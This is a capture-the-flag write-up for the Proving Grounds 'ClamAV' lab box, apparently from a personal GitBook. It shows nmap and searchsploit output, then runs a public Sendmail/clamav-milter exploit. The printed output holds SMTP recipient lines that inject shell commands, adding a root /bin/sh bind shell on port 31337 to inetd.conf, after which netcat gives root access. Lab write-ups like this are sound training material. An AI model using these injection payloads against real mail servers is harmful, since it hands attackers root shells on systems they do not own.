✍️
Imtodess
  • CTF writeups
  • Proving Grounds
    • Warmups
      • Linux
        • Pebbles
        • wombo
        • Bratarina
        • ClamAV
        • Exfiltrated
      • Windows
        • Internal
        • Metallus
        • Kevin
        • Algernon
    • Get to work
      • Linux
        • Payday
        • Hunit
        • Dibbles
        • Zino
        • Hetemit
        • Postfish
        • Sybaris
    • Try Harder
      • Peppo
  • Vulnhub
    • Linux
      • Devguru
      • DC~9
Powered by GitBook
On this page
  • Summary:
  • Enumeration
  • Nmap
  • Searchsploit:
  • Exploitation

Was this helpful?

  1. Proving Grounds
  2. Warmups
  3. Linux

ClamAV

Exploitation Guide for ClamAV | Proving Grounds

PreviousBratarinaNextExfiltrated

Last updated 3 years ago

Was this helpful?

Summary:

This box is easy and straight forward. We will exploit one of the services to get RCE as root.

Enumeration

Nmap

PORT    STATE SERVICE     VERSION                                                                                                                                       
22/tcp  open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)

25/tcp  open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.49.180], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to P
ostmaster at your site. 2.0.0 End of HELP info 

80/tcp  open  http        Apache httpd 1.3.33 ((Debian GNU/Linux))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
|_http-title: Ph33r

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

199/tcp open  smux        Linux SNMP multiplexer

445/tcp open  netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)

Searchsploit:

A quick search on sendmail will give us information about exploit which name is similar to that of box.

┌──(kali㉿kali)-[~/ctf/pg]                                                                                                                                              
└─$ searchsploit sendmail                                                                                                                                           1 ⨯ 
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path                           
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
...                                                                                                                              | unix/local/21884.txt
Sendmail 8.13.5 - Remote Signal Handling (PoC)                                                                                        | linux/dos/2051.py
Sendmail 8.6.9 IDENT - Remote Command Execution                                                                                       | unix/remote/20599.sh
Sendmail 8.9.2 - Headers Prescan Denial of Service                                                                                    | irix/dos/23167.c
Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (1)                                                              | linux/dos/21476.c
Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (2)                                                              | linux/dos/21477.c
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution                                                                       | multiple/remote/4761.pl
...

Exploitation

Copy exploit to your directory.

┌──(imtodess㉿deathnote)-[~/…/boxes/pg/clamav/exploit]                                                                                                                  
└─$ searchsploit -m multiple/remote/4761.pl                                                                                                                             
  Exploit: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution                                                                                              
      URL: https://www.exploit-db.com/exploits/4761                                                                                                                     
     Path: /usr/share/exploitdb/exploits/multiple/remote/4761.pl                                                                                                        
File Type: ASCII text, with CRLF line terminators                                                                                                                       
                                                                                                                                                                        
Copied to: /home/kali/oscp/boxes/pg/clamav/exploit/4761.pl

Its a perl script which take targetip. On successful attempt it will open port at 31337 which we can connect and execute commands.

┌──(imtodess㉿deathnote)-[~/…/boxes/pg/clamav/exploit]
└─$ sudo perl 4761.pl 192.168.154.42                                                                                                                              130 ⨯
[sudo] password for imtodess: 
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.154.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Tue, 24 Aug 2021 13:37:10 -0400; (No UCE/UBE) logging access from: [192.168.49.154](FAIL)-[192.16
8.49.154]
250-localhost.localdomain Hello [192.168.49.154], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 17OHbALb003999 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection

Now connect to port 31337 and get the flag.

┌──(imtodess㉿deathnote)-[~/…/boxes/pg/clamav/exploit]
└─$ nc 192.168.154.42 31337
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
cat proof.txt
<Redacted>